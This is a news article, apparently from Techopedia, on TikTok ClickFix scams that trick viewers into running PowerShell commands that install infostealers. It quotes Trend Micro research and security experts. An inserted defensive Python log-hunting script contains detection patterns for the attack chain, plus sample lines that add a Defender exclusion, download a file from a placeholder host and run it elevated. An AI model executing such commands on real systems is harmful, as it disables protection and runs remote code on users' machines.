How TikTok ClickFix Scams Trick You Into Malware Downloads


If you’re active on TikTok, you’ll notice it’s grown from just a digital playground for teens dancing to flashy memes to a place where people, both young and old, jump on trends, share loads of tips and tricks, and find quick fixes for everyday problems.

However, recent Trend Micro research has confirmed that TikTok quick-fix videos have become a launchpad for ClickFix attacks, which have quietly turned viewers into victims.

The videos are often disguised to offer simple hacks for issues relating to Windows OS, Microsoft Office activation, or unlocking paid features in apps like CapCut. But in essence, they are tuned to deliver ClickFix malware.

Here’s everything you need to know about ClickFix scams on TikTok, why they’re proving so alarmingly effective, and how you may become a victim.

Key Takeaways

  • ClickFix scams use TikTok videos to trick users into downloading malware disguised as quick tech fixes.
  • The videos often promote PowerShell commands or third-party downloads that install infostealers like Vidar or StealC.
  • These scams rely on trusted hosting sites, such as GitHub and Dropbox, to appear legitimate and evade user suspicion.
  • AI-generated videos make the scams harder to detect by removing common red flags like poor editing or unnatural dialogue.
  • Experts urge users to “pause and verify” any tech advice from social media and cross-check it with trusted sources.

What Is a ClickFix Scam?

As the name suggests, ClickFix is a type of social engineering attack that disguises malware execution as a quick computer fix. The name comes from the behavior it encourages: just a few clicks, and your problem is fixed. In reality, those steps quietly lure you into installing malware that can harvest everything from saved passwords to crypto wallet data.

Late last year, security firm Proofpoint observed a surge in ClickFix scams, which had started appearing in phishing emails and fake software update pages. The tactic lures users with fake error messages and prompts them to copy and run a PowerShell command, often laden with malware.

In a chat with Techopedia, Steve Tcherchian, CEO of cybersecurity company XYPRO, explained why TikTok viralizes ClickFix videos. He said:

“TikTok’s algorithm amplifies engaging content fast, even if it’s malicious. Unlike email or forums, users are conditioned to trust and act quickly, especially when the video appears helpful or urgent.”

Screenshot of a PowerShell window displaying a command to enhance Spotify experience, alongside social media comments discussing it.
User engagement in one of the malicious video campaigns. Source: Trend Micro

Inside Trend Micro’s Investigation

In a recent investigation, researchers at Trend Micro uncovered a malware campaign that’s hiding in what appears to be ordinary AI-generated tech-help videos, with instructions on how to unlock premium software features for free.

The commands given in these videos download a remote script onto your computer that creates hidden folders and tells Windows Defender to ignore them. It then downloads malware, often infostealers like Vidar or StealC, and runs it with elevated privileges. If successful, the script installs a second file that ensures the malware runs at startup.

The script goes further to delete temporary folders, a step the researchers say is designed to minimize forensic traces and keep the malware under the radar.
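
For defenders, the chain of behaviours described above can be hunted in PowerShell script block logs (event ID 4104). The sketch below is an added example, not code from Trend Micro or Techopedia; the stage patterns, the alert threshold and the sample records are constructed assumptions.

```python
import re

# Stages the article attributes to the script. The patterns are illustrative
# assumptions, not indicators published by Trend Micro.
STAGES = {
    "defender_exclusion": re.compile(r"Add-MpPreference\b.*-ExclusionPath", re.I),
    "hidden_folder": re.compile(r"Attributes\b.*Hidden|attrib(\.exe)?\s+\+h", re.I),
    "remote_download": re.compile(
        r"Invoke-WebRequest|\biwr\b|DownloadFile|Start-BitsTransfer", re.I),
    "elevated_run": re.compile(r"Start-Process\b.*-Verb\s+RunAs", re.I),
    "startup_persistence": re.compile(r"CurrentVersion\\Run\b|\\Startup\\", re.I),
    "temp_cleanup": re.compile(r"Remove-Item\b.*(\$env:TEMP|\\Temp\\)", re.I),
}

# Constructed sample: (host, process id, script block text) as it might be
# exported from event ID 4104 records. Not real telemetry.
SAMPLE = [
    ("PC-01", 4312, r"Add-MpPreference -ExclusionPath 'C:\Users\Public\<folder>'"),
    ("PC-01", 4312, r"Invoke-WebRequest -Uri 'https://example.invalid/<file>' -OutFile $dst"),
    ("PC-01", 4312, r"Start-Process $dst -Verb RunAs"),
    ("PC-01", 4312, r"Remove-Item $env:TEMP\<folder> -Recurse -Force"),
    # Benign admin activity: a download plus cleanup, but no Defender exclusion.
    ("PC-02", 980, r"Invoke-WebRequest -Uri 'https://example.invalid/report.csv' -OutFile out.csv"),
    ("PC-02", 980, r"Remove-Item $env:TEMP\old.log"),
]

def triage(records, min_stages=3):
    """Group script blocks per (host, pid) and flag sessions that combine a
    Defender exclusion with a remote download and reach min_stages stages."""
    seen = {}
    for host, pid, text in records:
        hits = seen.setdefault((host, pid), set())
        hits.update(name for name, rx in STAGES.items() if rx.search(text))
    alerts = {}
    for key, hits in seen.items():
        core = {"defender_exclusion", "remote_download"} <= hits
        if core and len(hits) >= min_stages:
            alerts[key] = sorted(hits)
    return alerts

if __name__ == "__main__":
    for (host, pid), stages in triage(SAMPLE).items():
        print(f"{host} pid={pid}: {', '.join(stages)}")
```

Correlating several stages in one process keeps routine admin scripts, which often download files or clear temp folders on their own, from raising alerts.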

To make the content more convincing, the download links shown in the tutorials led to well-known platforms like GitHub, Dropbox, and MediaFire.

A screenshot of PowerShell code with functions for adding exclusions and downloading files with retries, highlighted in various colors.
A malicious PowerShell script from the ClickFix campaign. Source: Trend Micro

Many of the accounts alleged to be pushing this content were no longer active at the time of writing, but the quick-fix videos they posted reached thousands of viewers. One of the videos reportedly pulled in nearly 500,000 views before it was taken down.

Shaila Rana, IEEE Senior Member and Professor of Cybersecurity at Purdue University Global, told Techopedia that these types of ClickFix attacks are very tricky to detect and even harder to stop because AI refines them and removes easy red flags. She said:

“AI-generated videos eliminate traditional red flags that users rely on to identify scams – poor production quality, obvious fakeness, or suspicious-looking presenters.”

Why TikTok ClickFix Attacks Are a Real Threat

While the ClickFix campaign spotted by Proofpoint last year used fake error message dialogue boxes to trick victims, the more recent surge uncovered by Trend Micro is more dangerous. The scammers now impersonate trusted software such as Microsoft Word, Spotify, CapCut, and others, making the scam far more deceptive and deadly.

To add to that, hack videos on TikTok or other social media channels are rarely seen as serious cybersecurity risks. As a result, people generally don’t expect to be hacked simply by following a perceived DIY video.

Jimmie Lee, Founder and CEO at JLEE, explained this dynamic to Techopedia. He said:

“TikTok and social media platforms are the go-to hubs for life hacks, learning from tutorials, and identifying trends. Which means there is a level of assumed trust in the platform, which drops a person’s guard down.”

Trend Micro researchers maintain that another factor making TikTok scams in the form of ClickFix campaigns dangerous is their reliance on social engineering within the video itself.

“There is no malicious code present on the platform for security solutions to analyze or block. All actionable content is delivered visually and aurally,” they wrote in the report. This strategy helps the campaign evade traditional security tools that scan for suspicious links or code.

How You Can Stay Safe

Avoiding ClickFix scams begins with skepticism on platforms like TikTok, where viral content can feel more trustworthy than it is.

If a video encourages you to copy PowerShell commands or download files from an unfamiliar link, it is safest to ignore it. Even when links point to trusted platforms like GitHub, Google Drive, or Dropbox, that does not mean the files themselves are secure.

Users can also be protected from downloading harmful files at the browser level, says Professor Rana.

“Browsers could enhance download warnings specifically for executables linked from social media,” she said, while emphasizing the need to “promote the use of official app stores and verified software sources.” She further advises users to cross-reference any “tech fix” with multiple sources before taking action.

Professor Rana also encourages a shift in how people approach online advice. “User education should focus on the ‘pause and verify’ principle,” she explains. It should “encourage users to independently search for software solutions rather than following video instructions.”

Social media platforms could also play a larger role in protecting their users, and Tcherchian believes subtle reminders could help.

“Short in-app reminders like ‘Never install fixes from comments or bios’ can go a long way without killing the vibe,” he says. Still, he acknowledges that platforms may be reluctant to introduce these features. “All of this may lead to lower engagement and thus good luck seeing any of this any time soon.”

The Bottom Line

ClickFix reflects the shape of modern cyber threats, where social media virality and subtle malware delivery go hand in hand. Until stronger protections are built into these platforms, users are left to navigate these risks on their own.

Any video that asks you to follow commands, click a link, or download a file should be treated with caution because trendiness is not the same as trustworthiness.

If something feels off or too convenient, take a moment to verify it through reliable sources. That brief pause could prevent a major breach. It has made a difference for me more than once, not just on social media but in other online spaces where threats are easy to overlook.

Franklin Okeke
Technology Journalist

Franklin Okeke is an author and tech journalist with over seven years of IT experience. Coming from a software development background, his writing spans cybersecurity, AI, cloud computing, IoT, and software development. In addition to pursuing a Master's degree in Cybersecurity & Human Factors from Bournemouth University, Franklin has two published books and four academic papers to his name. Apart from Techopedia, his writing has been featured in tech publications such as TechRepublic, The Register, Computing, TechInformed, Moonlock, and other top technology publications. When he is not reading or writing, Franklin trains at a boxing gym and plays the piano.